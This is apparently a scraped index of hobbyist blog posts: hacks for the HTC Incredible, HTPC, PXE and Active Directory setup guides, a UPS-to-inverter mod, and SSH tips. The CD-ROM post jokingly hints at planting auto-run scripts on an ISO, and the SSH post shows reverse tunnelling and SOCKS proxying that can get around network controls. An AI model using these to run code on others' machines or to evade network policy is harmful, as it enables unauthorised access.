There is a nice ON/OFF switch for the CD-ROM that can be changed by anyone (non-rooted users). To enable/disable the CD-ROM feature follow these steps:\nDial ##7764726 Press Call Enter the password 000000 (6 zeros) Select Feature Settings Select CD-ROM Choose Enable or Disable Press Menu Select Commit Modifications (Don\u0026rsquo;t worry if it says no settings changed) Press Home Using Your Own ISO The ISO file that is mounted needs to be named CDROM.ISO in /system/etc/. So, after deleting the default ISO image (via the good old rm command) you can replace it with any ISO image you want. However this will be difficult with large ISOs and it will be a pain to mount system with R/W access and use the command line every time you want to change the ISO. So I propose this alternate solution: use a symbolic link! I made a symbolic link in /system/etc/CDROM.ISO that points to a CDROM.ISO on my internal memory card. To do this run this command as root:\nrm /system/etc/CDROM.ISO #if you have not yet deleted the CD-ROM image ln -s /emmc/CDROM.ISO /system/etc/CDROM.ISO Replace /emmc/ with /sdcard/ if you want to use your SD card and not the phone\u0026rsquo;s internal memory.\nFinishing Up Now place an ISO file on either your SD card or internal memory and it should be mounted as a CD-ROM drive. I\u0026rsquo;ll let you be creative with what you could put in there (cough auto-run scripts cough). Unfortunately I cannot seem to get computers to boot off the ISO using this method. I\u0026rsquo;m guessing that it is because when the Incredible mounts the ISO it strips the boot flag. Also, since this hack will make the Incredible always access either your internal memory or your SD card, when selecting mount over USB the drive holding the ISO will be busy or in use by the system and sometimes will not mount on the computer.
This can be fixed by force unmounting the drive (in your phone\u0026rsquo;s settings menu) or by temporarily disabling the CD-ROM feature (see above).\nTo my knowledge this hack only applies to the HTC Incredible with the official 2.2 build or ROMs built off of the official 2.2 build. Please let me know in the comments if this works on any other phones.\n","permalink":"https://lanrat.com/posts/htc-incredible-virtual-cd-rom-hack/","summary":"\u003cp\u003eThe official HTC Incredible 2.2 update added a new feature to the ROM. When the phone is connected to a computer via USB, even if the memory card is not mounted, it will act as a virtual CD-ROM. It basically just acts as a CD-ROM drive with the disk image found in \u003ccode\u003e/system/etc/CDROM.ISO\u003c/code\u003e. The default ISO was some annoying Verizon thing. Most (rooted) users simply deleted the ISO from their system. I however found a way to make this feature a bit more useful.\u003c/p\u003e","title":"HTC Incredible Virtual CD-ROM Hack"},{"content":"The PC I wanted an HTPC that I could use to play anything, and that could do anything. And since it was going to be hooked up to a big TV, it might as well be powerful enough to play some modern games on the big screen. I chose to use a relatively new computer (Core 2 Duo 2GHz, Nvidia GeForce GT 220) and run Windows 7. My previous HTPC ran Linux, but with a powerful enough computer, the ability to play games on the HTPC made me move to Windows.\nThe Three HTPC pieces I find that XBMC, Hulu Desktop, and Boxee are all essential parts of a well-rounded Home Theater PC (HTPC). XBMC is great for managing and playing back all of your local media. Hulu Desktop is the complete solution to play anything from Hulu on the big screen. And Boxee does a great job of playing back other online media, such as The Daily Show, Pandora, etc. However these three media center programs do not play nice together.
There are some small hacks that can make maybe two get along, but not a complete solution.\nThe Glue To control all three programs I use EventGhost. EventGhost is a Windows automation tool which can perform a set of actions based on some user input, usually a key-press, remote control, or other such device. I was lucky enough to have an HP remote control and USB IR sensor from a laptop I had, pictured below:\nWindows 7 automatically recognized the driver for the remote and with the MCE Remote plugin I was able to have EventGhost use it as an input device. I set EventGhost to capture all of the remote\u0026rsquo;s input and unregister it as a HID device. This stops Windows from acting on the remote and gives EventGhost complete control over it.\nNext I started creating my EventGhost profile. I chose a button to launch each of the HTPC apps previously mentioned. When pressed, the action for the button would kill any/all running HTPC apps and then start the app that I assigned to the button. This allows me to start any of the apps from the remote and switch between them easily. I also assigned a fourth button that would just kill them all, bringing me to the Windows desktop. I assigned the D-PAD and OK buttons to the arrow keys and enter key. That takes care of most of the universal buttons that should apply across all of the programs. Now I went on to the program-specific stuff. Hulu Desktop does not need much else or accept any other keyboard shortcuts, but Boxee and XBMC share a few. The next buttons I mapped to the remote are [Backspace], I, [Space], P, X, [Period], [Comma], F, R, H, [Tab], and M. Refer to each program\u0026rsquo;s site to see what each one does. I also added a few extra actions for raising and lowering the volume, ejecting the drive tray, and powering off the computer.\nI also made a toggle button that would change the D-Pad and OK button from arrow keys and enter to mouse movement and left click.
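The launcher logic described above (each launcher button kills every running HTPC app before starting its own, plus a fourth kill-all button) is essentially a dispatch table. A Python sketch of that logic, for illustration only: the button names are hypothetical, process control is simulated with a set, and the real thing is configured in EventGhost's GUI rather than in code.

```python
# Sketch of the EventGhost profile logic: each launcher button kills all
# HTPC apps, then starts the one assigned to it.
running = set()  # simulated set of running HTPC apps

def kill_all():
    """Fourth button: kill everything, back to the desktop."""
    running.clear()

def launch(app):
    kill_all()  # never let two full-screen HTPC apps fight over the display
    running.add(app)

# Hypothetical remote-button assignments
BUTTONS = {
    "green": lambda: launch("XBMC"),
    "yellow": lambda: launch("Hulu Desktop"),
    "blue": lambda: launch("Boxee"),
    "red": kill_all,
}

def on_remote_event(button):
    action = BUTTONS.get(button)
    if action is not None:
        action()
```

Unmapped buttons fall through untouched, which mirrors EventGhost capturing the remote while only acting on the events a macro is bound to.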
You can download my EventGhost config file at the end of this article. Below is what my configured EventGhost looks like:\nBy now the HTPC setup should be working. You should be able to control and switch between Boxee, XBMC, and Hulu Desktop all from your remote. Just remember to make EventGhost start when Windows does; this can easily be done by placing a shortcut to EventGhost in your User\u0026rsquo;s startup folder.\nAn Extra Surprise After using this method for a while, I discovered that the MCE remote would detect my TV\u0026rsquo;s remote control (pictured below). I could tell because the USB sensor would light up red (showing that it received a signal) when I pressed a button on the TV remote. And lo and behold, EventGhost could detect the signal too!\nThis Toshiba remote is also programmable, meaning that it has the ability to also control your VCR, DVD player, etc. I went through all of the preset codes it can use (by entering them all manually and testing them) and found the one that let the USB IR sensor detect the most buttons. For most codes only a few buttons worked, and for some none did. Oddly enough the code \u0026ldquo;000\u0026rdquo; had almost all the buttons working. So I went through all the actions in EventGhost and reassigned them to a button on my TV\u0026rsquo;s remote. This allows me to control both my TV and HTPC from the same remote. All I need to do is switch the Mode/Device at the bottom of the remote to change which device I am controlling.\n","permalink":"https://lanrat.com/posts/use-eventghost-to-make-a-xbmc-hulu-and-boxee-htpc/","summary":"\u003ch2 id=\"the-pc\"\u003eThe PC\u003c/h2\u003e\n\u003cp\u003eI wanted an HTPC that I could use to play anything, and that could do anything. And since it was going to be hooked up to a big TV, it might as well be powerful enough to play some modern games on the big screen. I chose to use a relatively new computer (Core 2 Duo 2GHz, Nvidia GeForce GT 220) and run Windows 7.
My previous HTPC ran Linux, but with a powerful enough computer, the ability to play games on the HTPC made me move to Windows.\u003c/p\u003e","title":"Use EventGhost to Make a XBMC Hulu and Boxee HTPC"},{"content":"This is a simple how-to on using Microsoft\u0026rsquo;s Active Directory for user authentication on Linux systems. The method described in this guide should work for CentOS, Red Hat Enterprise Linux (RHEL), and Fedora. Debian-based distributions do not have the tools used in this method and require a different setup. This guide used CentOS 5.5 with a minimal text-only install; however, it should apply the same to other compatible versions of Linux.\nInstalling the Software We will need two packages installed to join the Active Directory (AD) domain and use it for user authentication: authconfig and samba-common. authconfig should be installed by default, but with a minimal install you will need to install samba-common. Install them with the following command:\nyum install samba-common authconfig Setting up Authconfig Start authconfig by running authconfig-tui. If you have a graphical desktop such as GNOME installed you can launch it from System-\u0026gt;Administration-\u0026gt;Authentication, but this guide will cover the text/cli version.
But the same steps apply to both methods.\nUnder user information select \u0026ldquo;Use Winbind\u0026rdquo;\nUnder authentication select \u0026ldquo;Use MD5 Passwords\u0026rdquo;, \u0026ldquo;Use Shadow Passwords\u0026rdquo;, \u0026ldquo;Use Winbind Authentication\u0026rdquo;, and \u0026ldquo;Local authorization is Sufficient\u0026rdquo;.\nYour screen should look like this:\nClick Next\nChange the \u0026ldquo;Security Model\u0026rdquo; to \u0026ldquo;domain\u0026rdquo;\nUnder \u0026ldquo;Domain\u0026rdquo; enter your Active Directory domain.\nEnter the FQDN (fully-qualified domain name) of your domain servers; if you have more than one, separate them with commas.\nThe ADS realm is the full domain name; it must be in all caps.\nTo allow users to log in, change the template shell to /bin/bash, or whatever shell you prefer.\nThe screen should now look like this, but with your correct information:\nSelect OK.\nSetting Up Samba Now you need to edit /etc/samba/smb.conf. You will see many of the settings you just entered in this file; however, we still need to manually change one value that authconfig does not set for us. Look for \u0026ldquo;winbind use default domain\u0026rdquo; and change it from false to true.\nSetting up PAM PAM controls user logins, and we need to create a home directory for domain users on their first login. All domain users will have a home directory in /home/Domain/user, where Domain is your domain and user is their username. Create the Domain folder inside the /home directory with the mkdir command as root.\nNext we need to enable the user\u0026rsquo;s home directory creation in PAM. Edit /etc/pam.d/system-auth. Scroll to the end of the file and at the end add this:\nsession optional pam_mkhomedir.so Save the file and exit. To make these changes take effect we need to restart the winbind service and the oddjobd service. This can usually be done with the service command.
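For reference, the two manual edits above end up looking like this in the files (a sketch; the comments mark which file each line belongs to):

```text
# /etc/samba/smb.conf -- in the [global] section
winbind use default domain = true

# /etc/pam.d/system-auth -- appended as the last line
session     optional      pam_mkhomedir.so
```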
I will not cover that here.\nJoining the Domain Now that the system is configured correctly we will actually join the system to the Active Directory domain. Run the \u0026ldquo;authconfig-tui\u0026rdquo; program again. Click Next. This time, on the second screen, select \u0026ldquo;Join Domain\u0026rdquo;. Enter a domain administrator\u0026rsquo;s username and password and join the domain. After entering the credentials select OK to save and exit.\nYou are now done. You should be able to log out (as root) and log in as any domain member. Upon first login your home directory should be created automatically.\n","permalink":"https://lanrat.com/posts/use-active-directory-for-linux-logins/","summary":"\u003cp\u003eThis is a simple how-to on using Microsoft\u0026rsquo;s Active Directory for user authentication on Linux systems. The method described in this guide should work for CentOS, Red Hat Enterprise Linux (RHEL), and Fedora. Debian-based distributions do not have the tools used in this method and require a different setup. This guide used CentOS 5.5 with a minimal text-only install; however, it should apply the same to other compatible versions of Linux.\u003c/p\u003e","title":"Use Active Directory for Linux logins"},{"content":"A car inverter will take the 12 volts DC from your car, usually from your cigarette lighter, and turn it into 110 volts AC, which is what you get out of your home power outlets. This allows you to plug household electronics into your car. The most common would probably be your laptop. Home UPS systems do the same thing, except instead of using a car outlet they use a 12-volt battery. I used an old home UPS system I had lying around that had a bad battery. (We don\u0026rsquo;t use the battery in this mod)\nPreparing the UPS Here is the UPS before any modifications:\nOnly half of the outlets on the device are given power from the UPS system; the rest act as a regular surge strip.
The first thing I did was rewire the \u0026ldquo;surge\u0026rdquo; outlets to be wired into the UPS power so that all of the outlets would be provided power from the UPS system.\nNext I took a car plug adapter I had lying around and connected it to the battery terminals after removing the battery.\nTesting The UPS system was working and outputting ~106 volts AC from a car\u0026rsquo;s 12-volt outlet. Here you can see it in action with my meter and a wireless router.\nThis worked great, but the UPS has a buzzer in it which stayed on. The purpose of this buzzer was to notify you that your power is out and that you are on battery power. However, it serves no purpose here and is just really annoying. I fixed it by desoldering the buzzer from the main circuit board.\nSome Final Modifications In addition to removing the buzzer, I also wanted to make the device smaller, as half of it is empty space due to the lack of a battery.\nI started by moving two of the LEDs that are on the battery end over to the power switch. I moved just the Power and Overload LEDs, as the rest served no purpose for an inverter.\nI used a pipe saw to cut off the battery compartment; there was already a divider on the inside that would now act as the outside wall on that end.\nThis UPS works perfectly as a power inverter. I have used it on several road trips just fine, and because it was intended to be a computer UPS, it can power 350 watts, which is much more than your average car inverter.\n","permalink":"https://lanrat.com/posts/build-your-own-car-power-inverter/","summary":"\u003cp\u003eA car inverter will take the 12 volts DC from your car, usually from your cigarette lighter, and turn it into 110 volts AC, which is what you get out of your home power outlets. This allows you to plug household electronics into your car. The most common would probably be your laptop. Home UPS systems do the same thing, except instead of using a car outlet they use a 12-volt battery.
I used an old home UPS system I had lying around that had a bad battery. (We don\u0026rsquo;t use the battery in this mod)\u003c/p\u003e","title":"Build Your Own Car Power Inverter"},{"content":"This guide will tell you how to let a Windows computer make use of your N810\u0026rsquo;s GPS as if it was its own. While the Nokia N810 does not have the best GPS in the world, it is still better than no GPS. On a recent road trip I wanted a way to visualize my trip route on a more powerful device than my N810\u0026rsquo;s 400MHz processor and Maemo Mapper. I wanted the full use of my laptop, Google Earth and the Internet.\nPreparing The Tablet The built-in GPS software does not allow us to do anything advanced like this. We will be using Minigpsd as a replacement for the built-in GPS interface software. Minigpsd allows for many more advanced options for the GPS, and may even help it get a lock faster. Install Minigpsd from the above link. After the installation is complete open up the settings and click the \u0026ldquo;Advanced\u0026rdquo; button. Here you will be able to see and set the ports Minigpsd communicates on. You can either leave them at their defaults or change them however you see fit. Below is a screenshot of my configuration.\nNow you need to network the tablet and your computer. In my case (on a road trip) I did not have an access point available, especially in a moving car. So I used an ad-hoc wireless network. But you can use any method you want, including Bluetooth PAN or your cellular network. I will not go into how to set this up here.\nPreparing The Computer Assuming that your computer is now networked to your N810, you will need software that can take the GPS data from the N810 over the network and bring it to the computer in a form it can use. The best software that I could find that does this is HW Group\u0026rsquo;s Virtual Serial Port. This software will take the GPS data and make a virtual serial port.
From your computer\u0026rsquo;s point of view it will think that there is a serial GPS attached to it.\nSimply start up the virtual serial port software and create a new virtual serial port. It will need an IP address and port. The IP is the IP of your tablet and the port is the \u0026ldquo;gps direct\u0026rdquo; port. In the above example it is 22947. Once the port is created make sure your N810 is on, that you can ping it from your computer, and that GPSD is running.\nTesting It Out Your computer should now see your N810 as a raw serial GPS device. To test it out, install some GPS-aware software. I used Google Earth.\nIn Google Earth open Tools -\u0026gt; GPS -\u0026gt; Real Time and you should see the following:\nIf you want to start tracking the N810, click Start. You can change the frequency of the position updates by changing the \u0026ldquo;Polling interval\u0026rdquo;.\nAn alternate method of setting this up without the use of any serial-port emulator on the computer is to use Google Earth\u0026rsquo;s Network Link function. This will allow Google Earth to look on the N810 for a KML file containing its current longitude and latitude, and use that instead. This KML file can be found on GPSD\u0026rsquo;s internal web server. In the above example we can see I have it set to run on port 8888. Below is my example configuration:\nI suggest you uncheck \u0026ldquo;Allow this folder to be expanded\u0026rdquo; because this file will only contain one updating set of points. Also, if you want to use this for real-time tracking, set the \u0026ldquo;Time-Based Refresh\u0026rdquo; to Periodically and choose the number of seconds you want between updates; the lower the value, the smoother the movement will appear.\nThis concept should work with any GPSD-compatible device, including other computers and some modern cell phones, and is in no way limited to Google Earth.
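Since the "gps direct" port is just a raw NMEA stream over TCP, a few lines of Python can consume it directly. This is a sketch: the host is an assumption, 22947 is the port from the example configuration, and the parser only handles well-formed GGA sentences:

```python
# Sketch: read (lat, lon) fixes straight from the tablet's raw NMEA
# TCP stream. TABLET_HOST/port below are assumptions for illustration.
import socket

def parse_gga(sentence):
    """Parse a $GPGGA sentence into (lat, lon) in decimal degrees.
    Returns None for non-GGA sentences or sentences without a fix."""
    fields = sentence.strip().split(",")
    if len(fields) < 6 or not fields[0].endswith("GGA") or not fields[2]:
        return None

    def dm_to_deg(value, hemisphere):
        # NMEA packs coordinates as [d]ddmm.mmmm (degrees + minutes)
        dot = value.index(".")
        degrees = float(value[:dot - 2])
        minutes = float(value[dot - 2:])
        result = degrees + minutes / 60.0
        return -result if hemisphere in ("S", "W") else result

    return dm_to_deg(fields[2], fields[3]), dm_to_deg(fields[4], fields[5])

def stream_fixes(host="192.168.1.2", port=22947):
    """Yield fixes from the gps direct port until the connection drops."""
    with socket.create_connection((host, port)) as sock:
        for line in sock.makefile("r", errors="replace"):
            fix = parse_gga(line)
            if fix is not None:
                yield fix
```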
I have also tested it with NetStumbler and inSSIDer.\n","permalink":"https://lanrat.com/posts/n810-as-computer-gps/","summary":"\u003cp\u003eThis guide will tell you how to let a windows computer make use of your N810\u0026rsquo;s GPS as if it was its own. While the Nokia N810 does not have the best GPS in the world it is still better than no GPS. On a recent road trip I wanted a way to visualize my trip route on a more powerful device than my N810\u0026rsquo;s 400MHz processor and \u003ca href=\"https://garage.maemo.org/projects/maemo-mapper/\"\u003eMaemo Mapper\u003c/a\u003e. I wanted the full use of my laptop, \u003ca href=\"https://earth.google.com/\"\u003eGoogle Earth\u003c/a\u003e and the Internet.\u003c/p\u003e","title":"N810 as Computer GPS"},{"content":"I recently got a HTC Incredible to replace my aging LG Chocolate. One feature of the Incredible was video out. Specifically the ability to output composite video to a TV. The cable was first demoed by WireFly here: https://www.youtube.com/watch?v=eJyt463AoOA And since then threads like these have started trying to hunt down the cable. And it looks like one day it may be sold at HTC Pedia or at Ben\u0026rsquo;s Bazaar. But for the time being this cable is not being sold anywhere, and there is a rumor that it may never be commercially sold.\nLuckily smokeynerd over at XDA Developers made a cable for himself and got the pinouts of the extra 7 pins in the Incredible\u0026rsquo;s Micro-USB port. See this thread: https://forum.xda-developers.com/showthread.php?p=6647344. With this information I set out to make my own cable. My first attempt was just to verify that it worked, and it was a success. I used alligator clips and needles to make the connection to the video out and ground. But this was not a practical solution because I needed to hold the needles in just the right place so that they would make contact.\nNow that I knew that it worked I set out to find something a little more practical. 
I found a ribbon cable that was just the right size and had the correct pin alignment in an old laptop (by old I mean it was so old it used the same processor as a desktop, think under 100MHz). Without thinking twice I scrapped the laptop and used the cable. This ribbon cable was not enough on its own; I also used a standard micro-USB cable to hold it in place, which also allowed the Incredible to charge/sync while the video out is in use. I used two alligator clips much like I did the first time to make the connections to the TV. Below you can see the ribbon cable and micro-USB.\nHere is a video of the final result:\nIt works, but I will still be looking into improving it, specifically removing the need for alligator clips. I also noticed that a few pixels are being cut off. This is not a limitation of my cable; this is probably software related, but could possibly have something to do with the Incredible\u0026rsquo;s video out hardware. When in landscape mode about 5 pixels are missing from the left, and when in portrait, both the top and bottom are being cut off. There are also bars on the TV (at least on mine) that go around the entire image, reducing the Incredible\u0026rsquo;s viewing area. I was also unable to get the audio to work via this connector, and the Incredible disables its speaker when using video out; however, the headphone output still works.\nUpdate I was able to fix the missing pixels and bars by adjusting my TV\u0026rsquo;s \u0026ldquo;picture size\u0026rdquo;. But I need to re-adjust it every time it switches from landscape to portrait or vice versa. Hopefully this is just a problem with this particular TV. Below you can see the phone\u0026rsquo;s screen without any bars or missing pixels on my TV.\nLinks Forum thread with pinouts Youtube Demo ","permalink":"https://lanrat.com/posts/htc-incredible-video-out/","summary":"\u003cp\u003eI recently got a HTC Incredible to replace my aging LG Chocolate. One feature of the Incredible was video out.
Specifically the ability to output composite video to a TV. The cable was first demoed by WireFly here: \u003ca href=\"https://www.youtube.com/watch?v=eJyt463AoOA\"\u003ehttps://www.youtube.com/watch?v=eJyt463AoOA\u003c/a\u003e And since then \u003ca href=\"https://www.droidforums.net/forum/droid-incredible-accessories/41047-micro-mini-usb-incredible.html\"\u003ethreads\u003c/a\u003e like \u003ca href=\"https://androidforums.com/htc-incredible/68032-tv-out-cable-htc-incredible.html\"\u003ethese\u003c/a\u003e have started trying to hunt down the cable. And it looks like one day it may be sold \u003ca href=\"http://shop.htcpedia.com/index.php?dispatch=products.view\u0026amp;amp;product_id=875\u0026amp;amp;compability_product=757\"\u003eat HTC Pedia\u003c/a\u003e or \u003ca href=\"http://www.bensbazaar.com/htc-oem-brand-name-av-micro-cable-for-htc-incredible-73h0034800m.html\"\u003eat Ben\u0026rsquo;s Bazaar\u003c/a\u003e. But for the time being this cable is not being sold anywhere, and there is a rumor that it may never be commercially sold.\u003c/p\u003e","title":"HTC Incredible Video Out"},{"content":"PXE is a method for booting an operating system over a network; it stands for Preboot Execution Environment. Here I will show you how to build a PXE server to boot and/or install operating systems over your network.\nInstalling the server OS I made this server inside VMWare; however, the steps are the same if you are using a different virtual machine server or a physical machine. I used Debian 5.0 and the net-install ISO. Since we only need a bare Debian install and just a few extra packages there is no need to download/install the entire OS.\nOnce you boot the installer follow all the installation prompts and enter the values that apply to you (language/timezone/password/etc).
When tasksel runs I would recommend you unselect all the options to get the smallest install possible.\nAfter this the installation will finish, the computer will reboot and you will be presented with a login prompt.\nInstalling and Setting up the required Services Now that you have a fresh install of Debian, install the required packages:\napt-get install tftpd-hpa dhcp3-server lftp This will install the TFTP server and a DHCP server, the two programs needed to load files over PXE. Next we need to configure the network to be static. Edit /etc/network/interfaces and change the network configuration to something like this:\niface eth1 inet static address 192.168.1.6 netmask 255.255.255.0 gateway 192.168.1.1 Now restart the network interface with ifdown eth1; ifup eth1 to have the new settings take effect.\nNext we want to edit /etc/dhcp3/dhcpd.conf. This is the configuration file for the DHCP server. You can look at the default file to see how it is set up, but we don\u0026rsquo;t need it. Replace it with:\nallow booting; allow bootp; option domain-name-servers 192.168.1.1; default-lease-time 86400; max-lease-time 604800; authoritative; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.100 192.168.1.200; filename \u0026#34;pxelinux.0\u0026#34;; next-server 192.168.1.6; option subnet-mask 255.255.255.0; option broadcast-address 192.168.1.255; option routers 192.168.1.1; } This configures your DHCP server to hand out addresses between 192.168.1.100-200 with a router of 192.168.1.1. If a DHCP client asks the server for boot information, it will be told to load a file named pxelinux.0 from 192.168.1.6, which is our server. DHCP is now set up.\nNow we need to edit the TFTP settings. Edit /etc/default/tftpd-hpa. Change RUN_DAEMON to yes and change the options directory to /tftp, then save and close the file. Now run mkdir -p /tftp to create our tftp folder.
This will be the server root.\nNow start the PXE server with:\n/etc/init.d/dhcp3-server start /etc/init.d/tftpd-hpa start Setting up the PXE tftp folder In the root of the tftp folder we need to have pxelinux.0. This is the file that our DHCP server tells the client to download. You can download the latest version from here: https://www.kernel.org/pub/linux/utils/boot/syslinux/ you will need pxelinux.0 found in the core folder of the zip. Place pxelinux.0 in the /tftp folder. Next create a pxelinux.cfg folder inside /tftp. And inside the pxelinux.cfg folder create a default file. This file will contain the boot information for clients if there is not a file that matches their MAC address. If there is one it would be in the pxelinux.cfg folder. Inside of default put:\nDISPLAY boot.txt DEFAULT debian_install LABEL debian_install kernel debian/lenny/i386/linux append vga=normal initrd=debian/lenny/i386/initrd.gz LABEL memtest kernel memdisk append initrd=memtest.img LABEL DSL kernel dsl/linux24 append ramdisk_size=100000 init=/etc/init lang=us apm=power-off vga=791 initrd=dsl/minirt24.gz nomce noapic quiet BOOT_IMAGE=knoppix PROMPT 1 TIMEOUT 0 And now create a boot.txt in your /tftp folder with the following contents:\n=PXE Boot Menu= +++++++++++++++ options are: debian_install DSL memtest Now boot.txt will be displayed, allowing you to enter a label that is defined in default, and it will boot that kernel with the given options. You can edit default and boot.txt however you like. In the examples I\u0026rsquo;ve given you have the option to install Debian, boot memtest, or boot Damn Small Linux. However we are still missing a vital part of the PXE server: the actual boot files. You can download the Debian netboot files from the Debian site; the DSL and memtest files can be found on their respective websites.\nEach boot option should go in its own folder inside the /tftp folder. In the above example Debian is in the debian folder, DSL is in the dsl folder.
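For orientation, the resulting /tftp layout from this example looks roughly like this (paths assume the Debian 5.0 "lenny" netboot files):

```text
/tftp
  pxelinux.0
  boot.txt
  memdisk
  memtest.img
  pxelinux.cfg/
    default
  debian/
    lenny/i386/linux
    lenny/i386/initrd.gz
  dsl/
    linux24
    minirt24.gz
```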
However, because memtest is only a single file, I put it directly in the tftp root. Remember you must edit the default file to contain the correct boot arguments and kernel for what you are trying to boot.\nHappy Network Booting!\nPXE from Syslinux\n","permalink":"https://lanrat.com/posts/building-a-pxe-server/","summary":"\u003cp\u003ePXE is a method for booting an operating system over a network; it stands for Preboot Execution Environment. Here I will show you how to build a PXE server to boot and/or install operating systems over your network.\u003c/p\u003e\n\u003ch2 id=\"installing-the-server-os\"\u003eInstalling the server OS\u003c/h2\u003e\n\u003cp\u003eI made this server inside VMWare; however, the steps are the same if you are using a different virtual machine server or a physical machine. I used Debian 5.0 and the net-install ISO. Since we only need a bare Debian install and just a few extra packages there is no need to download/install the entire OS.\u003c/p\u003e","title":"Building a PXE Server"},{"content":"This guide will tell you how to rename or switch network controller names in Linux. Often when installing Linux the installer will automatically pick the names of the network controllers. And for some reason the order it names them is almost always not the order I want them in. I usually like the primary/on-board card to be eth0 and all additional cards eth1-n; however, the installer often has its own ideas. So this is how to correct it!\nFirst off we need to tell the kernel which name gets associated with which physical card. On Debian-based systems the information is in /etc/udev/rules.d/70-persistent-net.rules and on Red Hat-based systems it is in /etc/sysconfig/network-scripts/ifcfg-ethX. You will need to edit those files as root. In each file will be a line for each network controller with its MAC address, driver, and name. You want to just edit the name to be what you want. For me that is often just changing eth0 to eth1 and vice versa.
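For reference, a typical entry in 70-persistent-net.rules looks like this (the MAC address is an example); renaming an interface is just a matter of editing the NAME value at the end:

```text
SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="00:11:22:33:44:55", ATTR{type}=="1", KERNEL=="eth*", NAME="eth0"
```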
When you are done you may save these files.\nNext you need to configure the IP information for the controllers. Edit (as root) /etc/network/interfaces. This file contains the IP address settings for each adapter. If you want eth0 to use DHCP use:\nauto eth0 iface eth0 inet dhcp If you want to set up a static IP address use:\niface eth1 inet static address 192.168.1.5 netmask 255.255.255.0 gateway 192.168.1.1 But obviously change the settings to fit your needs.\nNow save that file and reboot to apply the changes.\nStack Overflow Question on this\nManual temporary configuration As you should know, ifup ethX turns on the network interface and ifdown ethX turns it off, but these only work if the above interfaces file is configured correctly. If the file is configured incorrectly or you want to temporarily use a different configuration you can do so with these commands. Note that the adapter must be in the \u0026ldquo;down\u0026rdquo; state before issuing these; you can do this by running \u0026ldquo;ifdown ethX\u0026rdquo;.\nifconfig [device] [static ip] netmask [network mask] up route add default gw [router ip] Or, for DHCP (ifconfig itself cannot request a lease):\ndhclient [device] This will bring your current network adapter up with a temporary configuration which will be cleared the next time the adapter is brought down (either manually or by a reboot).\n","permalink":"https://lanrat.com/posts/switch-network-interface-in-linux/","summary":"\u003cp\u003eThis guide will tell you how to rename or switch network controller names in Linux. Often when installing Linux the installer will automatically pick the names of the network controllers. And for some reason the order it names them is almost always not the order I want them in. I usually like the primary/on-board card to be eth0 and all additional cards eth1-n; however, the installer often has its own ideas.
So this is how to correct it!\u003c/p\u003e","title":"Switch Network Interface in Linux"},{"content":"Part 1 - Screen Screen is a program that can create virtual terminals inside your current session. If you are familiar with tabbed web browsers, think of screen as adding tabs to your terminal. And, if your server allows it, you can disconnect sessions and keep them running in the background, even after you log out.\nYou can install screen on Debian with apt-get by running sudo apt-get install screen, or with yum install screen on RPM-based systems.\nStart screen by running:\nscreen The first time you run screen it will create a new window. This window is just like the session you left behind to enter screen. You can run any program you usually would, and exit or close the window by typing exit and pressing enter.\nNow for the fun part! Enter a new screen session by running screen. You can now run any program you like and leave it running; start your cli mail client or wget a large file. Now press Ctrl-a and then c. This will create a new window (or tab, if you will) in your current screen session. Ctrl-a is the screen hot-key that lets the user enter a command to screen rather than the currently running program or the current shell. In the previous example (Ctrl-a c), we told screen we were going to give it a command, then gave it the \u0026lsquo;c\u0026rsquo; command, which stands for Create. As you can guess, this created a new screen window.\nSome of the important screen commands: Ctrl-a k kills the current window, same as typing exit; Ctrl-a w lists all open windows; Ctrl-a n goes to the next window, cycling through the available windows; Ctrl-a d detaches the current session, letting it run in the background while you are dropped back into your shell.
You can resume the session anytime later (even after logging out) by running:\nscreen -r [SESSION_NAME] You can view a list of the available screen sessions by running:\nscreen -ls There is also a wild-card resume that will resume the last open session or create one if there are none; to resume any open session run:\nscreen -R Screen can also do much more. If you want to learn more take a look at the screen manual.\nPart 2 - SSH as a proxy The OpenSSH server has the ability to be used as a SOCKS proxy. Using it as a SOCKS proxy will allow you to run your proxied applications\u0026rsquo; network traffic through the ssh server.\nWindows with PuTTY You can use PuTTY to let a Windows client connect to the ssh/SOCKS proxy. On the PuTTY client go to the Tunnels page and enter any source port you want; this will be the port you tell your local applications to use as the proxy server port. Leave the destination field blank and select the dynamic check-box. Select Add to add the port. It should look like this:\nFrom here, once you connect to the ssh server, the port you specified on 127.0.0.1 or localhost will open as a SOCKS proxy.\nLinux To connect to an ssh server and use it as a SOCKS proxy from Linux, connect to the ssh server the way you normally would but add -D [PORT] as a parameter. -D requests dynamic (SOCKS) port forwarding, and [PORT] is the port that will listen for proxy connections on the local computer; just remember that if you are not root locally your port needs to be over 1024. Here is an example:\nssh -D 1234 mrlanrat@sshserver.com Using the Proxy Here is an example setting up the proxy with Firefox; it should be a similar configuration for other programs.\nPart 3 - X11 Forwarding X11 forwarding allows you to run X or graphical applications from the server over ssh.
To forward X programs over ssh on Linux apply the -X parameter; below is an example.\nssh -X user@host If you want to compress the X information while it is being transferred apply the -C argument.\nssh -C -X user@host And you can start X11 applications and still keep the shell active by appending an \u0026amp; to the end of the command. Example:\nfirefox \u0026amp; If you want to start the complete X desktop over ssh and not just a single application you can run:\nstartx On Windows you can enable X11 forwarding in PuTTY by clicking the Enable X11 forwarding checkbox in the X11 tab. Screenshot below:\nPart 4 - Reverse SSH You can ssh into a server that is behind a NAT through a reverse ssh tunnel. Put simply, the server needs to ssh into either the client machine or a machine that the client has access to, like a middleman. When the server sshes into the other computer, you will need to have it tunnel its port 22 (or whatever port ssh is running on) to any port on the client or middleman machine that the server is sshing to. Below is an example of this:\nssh -R 2222:localhost:22 user@client This assumes that port 2222 is the port on the client or middleman that will allow the client to ssh into the server. user@client is the user and host of the client or middleman server. From there, have the client either ssh into itself or the middleman server on that port and it will be tunneled into the server.\n","permalink":"https://lanrat.com/posts/ssh-tips-and-tricks/","summary":"\u003ch2 id=\"part-1---screen\"\u003ePart 1 - Screen\u003c/h2\u003e\n\u003cp\u003eScreen is a program that can create virtual terminals inside your current session. If you are familiar with tabbed web browsers, think of screen as adding tabs to your terminal.
